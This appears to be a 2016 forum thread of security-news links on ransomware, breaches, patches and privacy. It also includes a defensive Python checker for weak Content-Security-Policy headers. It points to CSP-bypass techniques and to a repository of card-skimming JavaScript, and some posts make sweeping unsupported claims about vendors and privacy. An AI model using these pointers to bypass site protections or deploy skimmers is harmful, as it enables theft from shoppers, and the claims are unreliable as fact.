Recent Hacks on Forums Show Platforms Remain Vulnerable to Fundamental Exploits
http://www.trendmicro.no/vinfo/no/security/news/vulnerabilities-and-exploits/recent-hacks-on-forums-show-platforms-remain-vulnerable-to-fundamental-exploits
-
Hitler Ransomware :o
http://news.softpedia.com/news/hitler-ransomware-infects-everyone-not-just-the-jews-507123.shtml
Two days ago, AVG security researcher Jakub Kroustek discovered a quite originally named ransomware variant called the Hitler Ransomware (actually Ransonware but the grammar Nazi lying in me could not let that pass) that deletes your files as a result of bad coding.
The Hitler ransomware infection takes place when the user double-clicks on an infected binary. According to Bleeping Computer, this file drops a batch file on the user's system, which then drops three files called firefox32.exe, ErOne.vbs, and chrst.exe.
Good news is that Avast! also blocked the ransomware.
-
Microsoft Security Bulletin Summary for August 2016
https://technet.microsoft.com/library/security/ms16-aug
-
Researchers crack open unusually advanced malware that hid for 5 years
http://arstechnica.com/security/2016/08/researchers-crack-open-unusually-advanced-malware-that-hid-for-5-years/
-
Google study shows unwanted software worse than malware
https://thestack.com/security/2016/08/08/google-study-shows-unwanted-software-worse-than-malware/
pdf.doc > https://static.googleusercontent.com/media/research.google.com/no//pubs/archive/45487.pdf
-
Got Ransomware? Negotiate
https://labsblog.f-secure.com/2016/08/10/got-ransomware-negotiate/
pdf.doc > https://fsecureconsumer.files.wordpress.com/2016/07/customer_journey_of_crypto-ransomware_f-secure.pdf
-
new TeamSpeak 3.0.13 server has several 0-day vulnerabilities which are critical
http://seclists.org/fulldisclosure/2016/Aug/61
-
A New Wireless Hack Can Unlock 100 Million Volkswagens
https://www.wired.com/2016/08/oh-good-new-hack-can-unlock-100-million-volkswagens/
-
Another good reason to block ads:
https://securelist.com/blog/incidents/75731/good-morning-android/
-
Economics Behind Ransomware as a Service: A Look at Stampado’s Pricing Model
http://blog.trendmicro.com/trendlabs-security-intelligence/the-economics-behind-ransomware-prices/
-
Why do we ignore up to 90% of computer security alerts?
http://www.tripwire.com/state-of-security/featured/security-alerts-multitasking/
-
Is this bringing Windows insecurity to Linux?
"Windows PowerShell helps IT professionals and power users control and automate the administration of the Windows operating system and applications that run on Windows."
https://technet.microsoft.com/en-us/library/bb978526.aspx
A new development: https://blogs.msdn.microsoft.com/powershell/2015/05/05/powershell-dsc-for-linux-is-now-available/
Is this going to be a Linux threat like Java was on Windows?
polonus
-
The above policy can be seen in quite another light if you read this
https://en.wikipedia.org/wiki/Embrace,_extend_and_extinguish
"Embrace, extend, and extinguish",[1] also known as "Embrace, extend, and exterminate",[2] is a phrase that the U.S. Department of Justice found[3] that was used internally by Microsoft[4] to describe its strategy for entering product categories involving widely used standards, extending those standards with proprietary capabilities, and then using those differences to disadvantage its competitors.
Often quoted by MS bashers concerning the Ubuntu/Debian example, but we have to admit MS is not doing great lately.
In various sectors MS did badly recently, missed the train where Android was concerned. Now they act like a Win10 push-man.
Remember, one always reaps as one sows; karma is the name of the game.
pol
-
2016 – The Year of Online Extortion
In all of 2015, we saw 29 new families of ransomware.
In the first half of 2016 alone, we’ve seen 79.
http://blog.trendmicro.com/2016-year-online-extortion-proven/
-
Whatsapp breaks two promises after being acquired by Farcebook:
1. whatsapp gets facebook directed ads,
2. whatsapp gets further integrated into facebook.
Click read and do not accept the user license, but one has to do that (not applied as per default) within 30 days.
You also have to set to "do not share" under settings.
Now facebook algorithms have access to your every whatsapp message,
despite the Privacy Shield Treaty, as big commerce will anyway do as they please.
What other services besides targeted ads services will be able to read into your every whatsapp message? NSA, FBI?
Do not share with Whatsapp what you do not want to share with others. Your data is what you pay for free services, and your privacy then ceases to exist, and what you share may come to bite you later.
polonus
-
Best heard reaction to the recent French-German requests/plans to undermine/outlaw encryption online to better monitor wannabe terrorists:
if crypto is outlawed, then only outlaws have crypto
polonus
-
Fantom Ransomware Encrypts your Files while pretending to be Windows Update
http://www.bleepingcomputer.com/news/security/fantom-ransomware-encrypts-your-files-while-pretending-to-be-windows-update/
http://www.neowin.net/news/fantom-ransomware-pretends-to-be-windows-update-while-it-encrypts-your-files
-
In the light of the new WhatsApp/Facebook privacy threat,
read: https://ico.org.uk/about-the-ico/news-and-events/news-and-blogs/2016/08/statement-on-changes-to-whatsapp-and-facebook-s-handling-of-personal-data/
and then what the ICO should look into: the data farcebook sits on and their dealings both with commerce and state surveillance: http://www.zdnet.com/article/firm-facebooks-shadow-profiles-are-frightening-dossiers-on-everyone/
Hope Big Brother will not turn angry on us, frightening spying and data-slurping.
Who will check them eventually?
polonus
-
CrowdStrike Machine Learning and VirusTotal
https://www.crowdstrike.com/blog/crowdstrike-machine-learning-virustotal/
CrowdStrike detection example (First submission 2016-08-26 06:24:22 UTC ( 1 day, 3 hours ago ))
https://www.virustotal.com/en/file/f7a4a9b58e9935d28dc69f7905b4bc6b41e3d2e08d62c9ffb1d37b316d3a2eaf/analysis/
also see > https://ctovision.com/2015/10/does-next-generation-anti-virus-solve-the-fatal-flaws-of-anti-virus/
also see > https://labsblog.f-secure.com/2016/08/26/whats-the-deal-with-machine-learning/
-
Opera server breach incident
https://www.opera.com/blogs/security/2016/08/opera-server-breach-incident/
-
RIPPER ATM MALWARE AND THE 12 MILLION BAHT JACKPOT
https://www.fireeye.com/blog/threat-research/2016/08/ripper_atm_malwarea.html
-
Watch out for this Phishing email
(http://screencast-o-matic.com/screenshots/u/Lh/1472589695444-64005.png)
(http://screencast-o-matic.com/screenshots/u/Lh/1472589505788-34522.png)
(http://screencast-o-matic.com/screenshots/u/Lh/1472589853992-81721.png)
I've received the same email for Walmart, Walgreen, Burger King, McDonalds, Sams, Choice Home Warranty, etc., etc., etc.
-
Big mal-ad campaign halted: http://blog.talosintel.com/2016/09/shadowgate-takedown.html
pol
-
After Chrome 53 browser update, some extensions became corrupted and no longer functioned, like e.g. https everywhere.
Try to reinstall and repair, if this does not work use this as an alternative: https://chrome.google.com/webstore/detail/kb-ssl-enforcer/flcpelgcagfhfoegekianiofphddckof/related
polonus
-
Pokémon-themed Umbreon Linux Rootkit Hits x86, ARM Systems
http://blog.trendmicro.com/trendlabs-security-intelligence/pokemon-themed-umbreon-linux-rootkit-hits-x86-arm-systems/?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed%3A+Anti-MalwareBlog+%28Trendlabs+Security+Intelligence+Blog%29
-
CSP is often wrongly configured in the live website theatre; it can be circumvented in over 94% of cases.
Read: https://speakerdeck.com/mikispag/making-csp-great-again-michele-spagnuolo-and-lukas-weichselbaum?slide=9
Content Security Policy is a web platform mechanism designed to mitigate cross-site scripting (XSS), the top security vulnerability in modern web applications. In this paper, we take a closer look at the practical benefits of adopting CSP and identify significant flaws in real-world deployments that result in bypasses in 94.72% of all distinct policies. We base our Internet-wide analysis on a search engine corpus of approximately 100 billion pages from over 1 billion hostnames; the result covers CSP deployments on 1,680,867 hosts with 26,011 unique CSP policies – the most comprehensive study to date. We introduce the security-relevant aspects of the CSP specification and provide an in-depth analysis of its threat model, focusing on XSS protections. We identify three common classes of CSP bypasses and explain how they subvert the security of a policy. We then turn to a quantitative analysis of policies deployed on the Internet in order to understand their security benefits. We observe that 14 out of the 15 domains most commonly whitelisted for loading scripts contain unsafe endpoints; as a consequence, 75.81% of distinct policies use script whitelists that allow attackers to bypass CSP. In total, we find that 94.68% of policies that attempt to limit script execution are ineffective, and that 99.34% of hosts with CSP use policies that offer no benefit against XSS. Finally, we propose the ’strict-dynamic’ keyword, an addition to the specification that facilitates the creation of policies based on cryptographic nonces, without relying on domain whitelists. We discuss our experience deploying such a nonce-based policy in a complex application and provide guidance to web authors for improving their policies.
Source: https://research.google.com/pubs/pub45542.html
Complete article: https://static.googleusercontent.com/media/research.google.com/nl//pubs/archive/45542.pdf
polonus
on circumvention techniques: http://webcache.googleusercontent.com/search?q=cache:7dHCHaXZa94J:https://coolaj86.com/articles/how-to-get-around-latest-browser-security-measures/&num=1&hl=nl&gl=pl&strip=0&vwsrc=1 source AJoNeal (for security researchers only, else do not visit).
D
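Added example (not the paper's tooling and not code from the linked deck): a small checker for the script-src patterns the quoted abstract describes, host whitelists, 'unsafe-inline' without a nonce or hash, and wildcard sources, beside the nonce-based 'strict-dynamic' policy shape the paper proposes. The two sample headers and the finding codes are constructed for this demonstration.

```python
"""Review the script-related parts of a Content-Security-Policy header.

Constructed example: flags the policy shapes the CSP study above reports as
ineffective (script whitelists, 'unsafe-inline' without a nonce/hash,
wildcard or scheme-only sources) and accepts the nonce + 'strict-dynamic'
shape it proposes instead.
"""
import re
from typing import Dict, List, Optional

# Constructed sample headers (not taken from any real site).
# A typical whitelist-based policy: the paper finds that the hosts most often
# whitelisted commonly expose endpoints that let an attacker bypass it.
WHITELIST_POLICY = (
    "default-src 'self'; "
    "script-src 'self' https://ajax.googleapis.com "
    "https://www.google-analytics.com 'unsafe-inline'"
)
# Nonce-based shape: 'unsafe-inline' and the scheme sources are fallbacks for
# browsers without nonce/'strict-dynamic' support; browsers that support them
# ignore those fallbacks. The nonce value is a constructed placeholder.
STRICT_POLICY = (
    "object-src 'none'; "
    "script-src 'nonce-EXAMPLEnonce123' 'unsafe-inline' 'strict-dynamic' https: http:; "
    "base-uri 'none'"
)

KEYWORD_RE = re.compile(r"^'.*'$")                     # 'self', 'none', 'nonce-...'
SCHEME_RE = re.compile(r"^[a-z][a-z0-9+.-]*:$", re.I)  # https:, data:, blob:

MESSAGES = {
    "SCRIPT_UNRESTRICTED": "no script-src or default-src: any script may run",
    "UNSAFE_INLINE": "'unsafe-inline' without a nonce/hash allows injected inline scripts",
    "UNSAFE_EVAL": "'unsafe-eval' allows string-to-code execution",
    "STRICT_DYNAMIC_WITHOUT_NONCE": "'strict-dynamic' needs a nonce or hash to admit any script",
    "HOST_WHITELIST": "host whitelist: bypassable if a whitelisted host serves an unsafe endpoint",
    "WILDCARD_SOURCE": "wildcard or scheme-only source admits scripts from anywhere",
    "OBJECT_SRC_OPEN": "object-src is unrestricted (plugins can execute script)",
    "BASE_URI_OPEN": "base-uri is unrestricted (a <base> tag can redirect relative script URLs)",
}


def parse_csp(header: str) -> Dict[str, List[str]]:
    """Split a CSP header into {directive-name: [source expressions]}.

    Directive names are case-insensitive and, as in the CSP spec, the first
    occurrence of a directive wins; later duplicates are ignored.
    """
    policy: Dict[str, List[str]] = {}
    for chunk in header.split(";"):
        tokens = chunk.split()
        if tokens:
            policy.setdefault(tokens[0].lower(), tokens[1:])
    return policy


def effective_sources(policy: Dict[str, List[str]], directive: str) -> Optional[List[str]]:
    """Resolve a directive, falling back to default-src where the spec does.

    base-uri has no default-src fallback. Returns None when nothing restricts
    the directive at all.
    """
    if directive in policy:
        return policy[directive]
    if directive != "base-uri" and "default-src" in policy:
        return policy["default-src"]
    return None


def review_policy(header: str) -> List[str]:
    """Return the finding codes for a header; an empty list means no finding."""
    policy = parse_csp(header)
    findings: List[str] = []

    scripts = effective_sources(policy, "script-src")
    if scripts is None:
        findings.append("SCRIPT_UNRESTRICTED")
    else:
        lowered = [s.lower() for s in scripts]
        has_nonce_or_hash = any(
            s.startswith(("'nonce-", "'sha256-", "'sha384-", "'sha512-")) for s in lowered
        )
        strict_dynamic = "'strict-dynamic'" in lowered
        if "'unsafe-inline'" in lowered and not has_nonce_or_hash:
            findings.append("UNSAFE_INLINE")
        if "'unsafe-eval'" in lowered:
            findings.append("UNSAFE_EVAL")
        if strict_dynamic and not has_nonce_or_hash:
            findings.append("STRICT_DYNAMIC_WITHOUT_NONCE")
        if not strict_dynamic:  # with 'strict-dynamic', host/scheme sources are ignored
            hosts = [s for s in scripts if s != "*" and not KEYWORD_RE.match(s) and not SCHEME_RE.match(s)]
            wild = [s for s in lowered if s == "*" or SCHEME_RE.match(s)]
            if hosts:
                findings.append("HOST_WHITELIST")
            if wild:
                findings.append("WILDCARD_SOURCE")

    if effective_sources(policy, "object-src") is None:
        findings.append("OBJECT_SRC_OPEN")
    if effective_sources(policy, "base-uri") is None:
        findings.append("BASE_URI_OPEN")
    return findings


if __name__ == "__main__":
    for label, header in (("whitelist", WHITELIST_POLICY), ("strict", STRICT_POLICY)):
        print(f"{label}: {header}")
        for code in review_policy(header):
            print(f"  {code}: {MESSAGES[code]}")
```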
-
Dridex Banking Trojan Will Soon Target Crypto-Currency Wallets
http://news.softpedia.com/news/dridex-banking-trojan-will-soon-target-crypto-currency-wallets-508041.shtml
http://i1-news.softpedia-static.com/images/news2/dridex-banking-trojan-will-soon-target-crypto-currency-wallets-508041-3.png
-
Rambler was hacked
https://www.leakedsource.com/blog/rambler
-
10(!)-year-old leak in Windows Media Player again used to spread malware:
http://blog.cyren.com/articles/windows-media-player-drm-feature-used-for-malware-delivery-again.html
DRM is supposed to let people only play legally obtained songs/movies.
It is a totally useless system if it can be used to spread illegal (malicious) content.
-
Cryptocurrency Mining Malware Discovered Targeting Seagate NAS Hard Drives
http://news.softpedia.com/news/cryptocurrency-mining-malware-discovered-targeting-seagate-nas-hard-drives-508119.shtml
-
The French Dark Net Is Looking for Grammar Police
http://blog.trendmicro.com/trendlabs-security-intelligence/the-french-dark-net-is-looking-for-grammar-police/
-
Everyone worldwide who uses Tor or a VPN, or is unwillingly part of a botnet, could now be hacked by the FBI,
according to procedural changes to Rule 41: https://blog.torproject.org/blog/fbis-quiet-plan-begin-mass-hacking and https://www.eff.org/deeplinks/2016/06/help-us-stop-updates-rule-41
polonus
-
Armada Collective DDoS Extortion Group Now Threatens Ransomware Infections
http://news.softpedia.com/news/armada-collective-ddos-for-bitcoin-group-now-threatens-ransomware-infections-508248.shtml :o
-
BkSoD by Ransomware:
HDDCryptor Uses Commercial Tools to Encrypt Network Shares and Lock HDDs
http://blog.trendmicro.com/trendlabs-security-intelligence/bksod-by-ransomware-hddcryptor-uses-commercial-tools-to-encrypt-network-shares-and-lock-hdds/?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed%3A+Anti-MalwareBlog+%28Trendlabs+Security+Intelligence+Blog%29
-
Adobe Security Bulletin
https://helpx.adobe.com/security/products/flash-player/apsb16-29.html
-
September Patch Tuesday: Browser, Exchange, Office Bugs Dominate
http://blog.trendmicro.com/trendlabs-security-intelligence/september-patch-tuesday-browser-exchange-office-bugs-dominate/?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed%3A+Anti-MalwareBlog+%28Trendlabs+Security+Intelligence+Blog%29
Microsoft Patches IE/Edge Zero-day Used in AdGholas Malvertising Campaign
http://blog.trendmicro.com/trendlabs-security-intelligence/microsoft-patches-ieedge-zeroday-used-in-adgholas-malvertising-campaign/?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed%3A+Anti-MalwareBlog+%28Trendlabs+Security+Intelligence+Blog%29
-
Finnish police: Keep your car keys in the fridge
http://yle.fi/uutiset/finnish_police_keep_your_car_keys_in_the_fridge/9166149
https://labsblog.f-secure.com/2016/09/15/seriously-put-away-the-foil/
-
Do not think you are safe using a Tor browser! You can get malware-infested by a certificate-pinned, altered NoScript extension for instance, because Mozilla cannot protect you against such an attack: https://medium.com/@movrcx/tor-browser-exposed-anti-privacy-implantation-at-mass-scale-bd68e9eb1e95
Again a user is helpless against a direct attack from a party with enough resources (spooks, spies, whether corporate or government related - does not matter). Could it be your surveilling government organization this time - NSA, CIA, FBI or one of their global counterparts?
So refrain from sharing with the Internet that what you do not want to share with others. We have arrived in a situation where we can trust no one with our private digital information. It is all a question of trust: do you know who you can trust with your e2e encrypted info and where it lands eventually?
If you do not heed my warnings, you'd only have yourself to blame.
Three instances where we saw SSL security crumbling
Consider how three recent examples involving sub-CAs being used to produce phony certificates show that the classical root certificate authority-based trust model is breaking down:
Trustwave. In 2012, Trustwave issued a sub-CA to a private organization [2]. This sub-CA was to be loaded into a device performing a man-in-the-middle attack, and its sole purpose was to allow that device to generate trusted certificates for arbitrary domains, allowing interception against all devices on the network. This approach avoided the need to install a custom root certificate across all devices, and also prevented certificate warnings, by chaining the phony certificates to Trustwave.
TURKTRUST. In 2013, a sub-CA issued by TURKTRUST, a root certificate authority based in Turkey, issued a phony certificate for the google.com domain. The certificate pinning capabilities added to Chrome by Google detected this certificate in the wild [4].
ANSSI. Also in 2013, ANSSI, a root certificate authority controlled by the French government, issued a sub-CA to the French treasury department, IGC/A, and IGC/A in turn used the sub-CA to intercept and monitor employee web traffic [15].
Quote taken from source article: "Case Study: Fighting Back Against SSL Inspection", conducted by Jacob Thompson and directed by Stephen Bono.
polonus (volunteer website security analyst and website error-hunter)
-
"We have arrived in a situation where we can trust no one with our private digital information. It is all a question of trust and do you know who you can trust with your e2e encrypted info and where it lands eventually?"
We have been at this juncture for many years but no one believed those of us preaching this fact.
There were always those that thought that with enough encryption and the use of back doors, they still had an assurance of privacy.
Maybe now it's finally starting to sink in. Privacy on the internet is dead
-
Linux Security: A Closer Look at the Latest Linux Threats
http://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/linux-security-a-closer-look-at-the-latest-linux-threats
-
H1N1 Malware Adds Support for Infostealing Features, UAC Bypass
http://news.softpedia.com/news/h1n1-malware-adds-support-for-infostealing-features-uac-bypass-508408.shtml
-
iSpy Keylogger Returns with New Version and New Attacks
http://news.softpedia.com/news/ispy-keylogger-returns-with-new-version-and-new-attacks-508452.shtml
-
Update on add-on pinning vulnerability
https://blog.mozilla.org/security/2016/09/16/update-on-add-on-pinning-vulnerability/
-
Malvertising Campaign Using RIG EK Detected Pushing CrypMIC Ransomware
http://news.softpedia.com/news/malvertising-campaign-using-rig-ek-detected-pushing-crypmic-ransomware-508475.shtml
-
Over 840,000 Cisco Devices Affected by NSA-Linked Flaw
http://www.securityweek.com/over-840000-cisco-devices-affected-nsa-linked-flaw
-
I have been paying attention to these threats for years now at "virus and worms";
now they are also mentioned here:
https://blog.sucuri.net/2016/09/hacked-website-report-2016q2.html
7000 WP sites hacked lately.
PDF report available from link given,
polonus (volunteer website security analyst and website error-hunter)
-
According to TrendMicro 71% of known ransomware families arrive as mail attachments
http://blog.trendmicro.com/trendlabs-security-intelligence/rar-javascript-ransomware-figures-fluctuations-email-attachments/
Always upload and test attachments at an online multi-engine scanner before you open them:
www.virustotal.com
www.metadefender.com
www.jotti.org
-
Yahoo Confirms At Least 500 Million Accounts Were Hacked
http://fortune.com/2016/09/22/yahoo-hack/
http://money.cnn.com/2016/09/22/technology/yahoo-data-breach/
http://www.nbcnews.com/tech/tech-news/your-yahoo-account-was-probably-hacked-company-set-confirm-massive-n652586
-
Qadars Trojan Returns Bigger and Badder than Ever Before
http://news.softpedia.com/news/qadars-trojan-returns-bigger-and-badder-than-ever-before-508546.shtml
-
Drupal Core - Critical - Multiple Vulnerabilities - SA-CORE-2016-004
https://www.drupal.org/SA-CORE-2016-004
-
OpenSSL Security Advisory [22 Sep 2016]
https://www.openssl.org/news/secadv/20160922.txt
-
Krebs Website Hit By 620 Gbps DDoS Attack :o
http://www.infosecurity-magazine.com/news/krebs-website-hit-by-620-gbps-ddos/
-
Yahoo Confirms At Least 500 Million Accounts Were Hacked
http://fortune.com/2016/09/22/yahoo-hack/
http://money.cnn.com/2016/09/22/technology/yahoo-data-breach/
http://www.nbcnews.com/tech/tech-news/your-yahoo-account-was-probably-hacked-company-set-confirm-massive-n652586
This is from the BBC
http://www.bbc.com/news/world-us-canada-37447016
-
Yahoo Confirms At Least 500 Million Accounts Were Hacked
http://fortune.com/2016/09/22/yahoo-hack/
http://money.cnn.com/2016/09/22/technology/yahoo-data-breach/
http://www.nbcnews.com/tech/tech-news/your-yahoo-account-was-probably-hacked-company-set-confirm-massive-n652586
<snip>
The problem being this is from 2014 - so that horse has bolted long ago - if your data got stolen then it's probably a little late.
-
Research: AV vendor's privacy policy:
https://www.av-test.org/en/news/news-single-view/data-protection-or-virus-protection/
All AV vendors share your data with third parties.
If it's free, you are the product.
If it ain't free, you are still the product anyway!!
polonus
-
Research: AV vendor's privacy policy:
https://www.av-test.org/en/news/news-single-view/data-protection-or-virus-protection/
All AV vendors share your data with third parties.
If it's free, you are the product.
If it ain't free, you are still the product anyway!!
polonus
What about Avast!? @polonus :D
-
Research: AV vendor's privacy policy:
https://www.av-test.org/en/news/news-single-view/data-protection-or-virus-protection/
All AV vendors share your data with third parties.
If it's free, you are the product.
If it ain't free, you are still the product anyway!!
polonus
What about Avast!? @polonus :D
They have an Avast Free Privacy Policy and a VPN Privacy Policy; they share a lot of things: https://www.reddit.com/r/technology/comments/3lass7/avasts_privacy_policy_also_states_that_they_share/
Main and sole third-party partner = Google (Google Tag Manager). They say they only use your private data statistically, but as Google has access (and on Android, Google AdMob), it is out of sight, and Google can sit on it and sell it or turn it over to surveillance if requested and under gag order.
pol
-
Research: AV vendor's privacy policy:
https://www.av-test.org/en/news/news-single-view/data-protection-or-virus-protection/
All AV vendors share your data with third parties.
If it's free, you are the product.
If it ain't free, you are still the product anyway!!
polonus
What about Avast!? @polonus :D
They have an Avast Free Privacy Policy and a VPN Privacy Policy; they share a lot of things: https://www.reddit.com/r/technology/comments/3lass7/avasts_privacy_policy_also_states_that_they_share/
Main and sole third-party partner = Google (Google Tag Manager). They say they only use your private data statistically, but as Google has access (and on Android, Google AdMob), it is out of sight, and Google can sit on it and sell it or turn it over to surveillance if requested and under gag order.
pol
I prefer this link: https://www.avast.com/en-us/privacy-policy . It's up to date.
The one you posted gives a chopped up excerpt from a year old forum post. :)
-
MarsJoke Ransomware Targets the Government and K-12 Educational Sector
http://news.softpedia.com/news/marsjoke-ransomware-targets-the-government-and-k-12-educational-sector-508608.shtml
-
Is the cure worse than the initial problem?
CloudFlare now offers a solution to the so-called mixed content problem: http://forums.theregister.co.uk/forum/1/2016/09/20/cloudflare_offers_encryption_up_the_wazoo/
Re-writing every link to HTTPS where they can; and where they cannot, the green padlock is misleading.
They hope soon all of the internet has turned HTTPS Everywhere.
For the record, El Reg is also on American CloudFlare,
and they also dealt an additional little smear to Tor developers in their article.
By the way CloudFlare implemented their own certificate incorrectly:
Would you trust them with half-baked e2e encryption?
From the crypto-report:
Certificate is not installed correctly
cloudflare.com
This is not a Symantec certificate.
Please contact the Certificate Authority for further verification.
You have 2 errors
RSA wrong certificate installed.
The domain name does not match the certificate common name or SAN.
ECC wrong certificate installed.
The domain name does not match the certificate common name or SAN.
Info
BEAST
This server is vulnerable to a BEAST attack. More information.
Chain installation:
2 certificates found: RSA and ECC.
To view each certificate chain, click a tab below.
RSA
ECC
Certificate information
This server uses an Extended Validation (EV) certificate. Information about the site owner has been fully validated by COMODO CA Limited to help secure personal and financial information.
Common name:
SAN:
cloudflare.com, www.cloudflare.com
Valid from:
2015-Dec-01 00:00:00 GMT
Valid to:
2016-Nov-30 23:59:59 GMT
Certificate status:
Valid
Revocation check method:
OCSP
Organization:
CloudFlare, Inc.
Organizational unit:
COMODO EV Multi-Domain SSL
City/locality:
San Francisco
State/province:
California
Country:
US
Certificate Transparency:
Embedded in certificate
Serial number:
e3bb289893780deab01913b0a1400d77
Algorithm type:
SHA256withRSA
Key size:
2048
polonus
-
Over 850,000 Devices Affected by Unpatched Cisco Zero-Day
http://news.softpedia.com/news/over-840-000-devices-affected-by-unpatched-cisco-zero-day-508630.shtml
-
Free speech under fire where you do not expect it:
http://arstechnica.com/security/2016/09/why-the-silencing-of-krebsonsecurity-opens-a-troubling-chapter-for-the-net/
IoT devices turned against us!
polonus
-
Free speech under fire where you do not expect it:
http://arstechnica.com/security/2016/09/why-the-silencing-of-krebsonsecurity-opens-a-troubling-chapter-for-the-net/
IoT devices turned against us!
polonus
Brian Krebs reports Google is now protecting him:
https://krebsonsecurity.com/2016/09/the-democratization-of-censorship/
Today, I am happy to report that the site is back up — this time under Project Shield, a free program run by Google to help protect journalists from online censorship. And make no mistake, DDoS attacks — particularly those the size of the assault that hit my site this week — are uniquely effective weapons for stomping on free speech, for reasons I’ll explore in this post.
-
Free VPN or MIM-server? Read: http://lifehacker.com/stop-opera-s-new-vpn-from-leaking-your-ip-address-1773359437
They use surfeasy there. Read: https://www.surfeasy.com/privacy_policy/
polonus
-
New PonyForx Infostealer Malware Sold on Russian Hacking Forums
http://news.softpedia.com/news/new-ponyforx-infostealer-malware-sold-on-russian-hacking-forums-508661.shtml
-
The Donald Trump Ransomware tries to Build Walls around your Files
http://www.bleepingcomputer.com/news/security/the-donald-trump-ransomware-tries-to-build-walls-around-your-files/
-
OpenSSL Security Advisory [22 Sep 2016]
https://www.openssl.org/news/secadv/20160922.txt
OpenSSL Security Advisory [26 Sep 2016]
https://www.openssl.org/news/secadv/20160926.txt
-
MarsJoke Launches a New Ransomware Approach
http://www.infosecurity-magazine.com/news/marsjoke-launches-a-new-ransomware/
-
PoS Malware: Old Dog Learns New Tricks
http://blog.trendmicro.com/pos-malware-old-dog-learns-new-tricks/
-
MarsJoke Launches a New Ransomware Approach
http://www.infosecurity-magazine.com/news/marsjoke-launches-a-new-ransomware/
MarsJoke ransomware targets US government organisations, gives victims 96 hours to pay up before deleting files
http://www.ibtimes.co.uk/marsjoke-ransomware-targets-us-government-organisations-gives-victims-96-hours-pay-before-1583555
-
Inside Arizona’s Pump Skimmer Scourge
https://krebsonsecurity.com/2016/09/inside-arizonas-pump-skimmer-scourge/#more-36478
Gas pump skimming is on the rise everywhere.
-
Brazilian Hospitals Infected with Ransomware After RDP Brute-Force Attacks
http://news.softpedia.com/news/brazilian-hospitals-infected-with-ransomware-after-rdp-brute-force-attacks-508807.shtml
-
Sneaky JavaScript Waits for User Interaction Before Infecting Them with Malware
http://news.softpedia.com/news/sneaky-javascript-waits-for-user-interaction-before-infecting-them-with-malware-508827.shtml
-
Safe on tor. No, your DNS data may help to deanonymize you!
Read: http://www.securityweek.com/dns-data-can-help-attackers-deanonymize-tor-users
and https://freedom-to-tinker.com/2016/09/29/the-effect-of-dns-on-tors-anonymity/
Check: http://simpledns.com/lookup.aspx & http://www.dnsinspect.com/
polonus
-
Use Spotify? You May Have Been Infected With Malware
http://www.makeuseof.com/tag/use-spotify-infected-malware/
http://www.theregister.co.uk/2016/10/06/spotify_malware_free_music_service/
-
Hacked Steam accounts spreading Remote Access Trojan
http://www.bleepingcomputer.com/news/security/hacked-steam-accounts-spreading-remote-access-trojan/
-
Targets Czech-speaking countries, locks the screen and PC, and encrypts files on the C partition, adding the extension .k0stya; the D partition is clean!
Kostya Ransomware adds the extension .k0stya! Demonstration-of-attack video review.
https://youtu.be/Sti6F_VqC7Q
Is Avast! ready to deal with this ransomware?!!! :-\
-
List of 5900 webshops that have criminals skimming your credit cards: https://gist.github.com/gwillem/41084af200e0e5a8455681fa5858f5cc
Info credits: Willem de Groot, who has put this list online.
polonus
-
https://www.hackread.com/winrar-truecrypt-installer-dropping-malware/
-
List of 5900 webshops that have criminals skimming your credit cards: https://gist.github.com/gwillem/41084af200e0e5a8455681fa5858f5cc
Info credits: Willem de Groot, who has put this list online.
polonus
5900 online stores found skimming > https://gwillem.github.io/2016/10/11/5900-online-stores-found-skimming/
-
Microsoft Security Bulletin Summary for October 2016
https://technet.microsoft.com/library/security/ms16-oct
-
EFF warns against some use of Whatsapp,
read: https://ssd.eff.org/en
Be aware of the Whatsapp cloud, it does not have e2e.
Be aware of malicious update-messages. These are viruses.
We advise you here not to share with the Interwebs
what you would not be eager to share with members of the general public.
If it is fit for everyone to read, you have less to worry about.
Do not let your utterances come to bite you later.
Yes everything is being monitored,
and yes, politically correct censorship already exists.
polonus
-
Not nice when your personal data have been spilled... http://www.theregister.co.uk/2016/10/13/us_data_aggregator_megabreach/
They failed to check here: https://haveibeenpwned.com/
polonus
-
Several Exploit Kits Now Deliver Cerber 4.0
http://blog.trendmicro.com/trendlabs-security-intelligence/several-exploit-kits-now-deliver-cerber-4-0/
-
Exotic Ransomware Author Tries to be Friends with Security Researchers
http://news.softpedia.com/news/exotic-ransomware-author-tries-to-be-friends-with-security-researchers-509339.shtml
-
TrickBot Shows Strong Connection to Old Dyre Banking Trojan
http://news.softpedia.com/news/trickbot-shows-strong-connection-to-old-dyre-banking-trojan-509344.shtml
-
List of 5900 webshops that have criminals skimming your credit cards: https://gist.github.com/gwillem/41084af200e0e5a8455681fa5858f5cc
Info credits: Willem de Groot, who has put this list online.
Hi Pol/guys, anyone got a mirror link? It seems the list is down on GitHub (404). Thanks.
-
SUPEE-8788 (Magento)
https://magento.com/security/patches/supee-8788
-
Sierra Wireless Mitigations Against Mirai Malware
https://ics-cert.us-cert.gov/alerts/ICS-ALERT-16-286-01
-
Regulators are deciding the future of Europe’s Internet right now.
https://www.savenetneutrality.eu/?from=banner&optout=true
polonus
-
Detecting Malware Outbreaks Faster Using Multiple Anti-malware Engines
https://www.opswat.com/blog/detecting-malware-outbreaks-faster-using-multiple-anti-malware-engines
-
List of 5900 webshops that have criminals skimming your credit cards: https://gist.github.com/gwillem/41084af200e0e5a8455681fa5858f5cc
Info credits: Willem de Groot, who has put this list online.
Hi Pol/guys, anyone got a mirror link? It seems the list is down on GitHub (404). Thanks.
-> https://gwillem.gitlab.io/2016/10/14/github-censored-research-data/
-
List of 5900 webshops that have criminals skimming your credit cards: https://gist.github.com/gwillem/41084af200e0e5a8455681fa5858f5cc
Info credits: Willem de Groot, who has put this list online.
Hi Pol/guys, anyone got a mirror link? It seems the list is down on GitHub (404). Thanks.
-> https://gwillem.gitlab.io/2016/10/14/github-censored-research-data/
Reply from F-Secure
=============================================================
We have finished analyzing the submitted URLs, and 176 of the provided URLs have been found to be malicious, for which the appropriate ratings have been added. The updated ratings shall be reflected automatically via Security Cloud otherwise known as ORSP.
==============================================================
-
@Asyn,
New link where the list resides: https://github.com/gwillem/ecommerce-malware-collection/tree/master/js
Check these with a Magento security scanner like: https://www.magereport.com/scan/?s=
and other scans in your toolchest.
enjoy, my good friends,
pol
P.S.
Nota Bene.
Mind you, this is a commercial list to sort of "lure" infested or (potentially) insecure webshop owners
to Byte B.V.'s security support services,
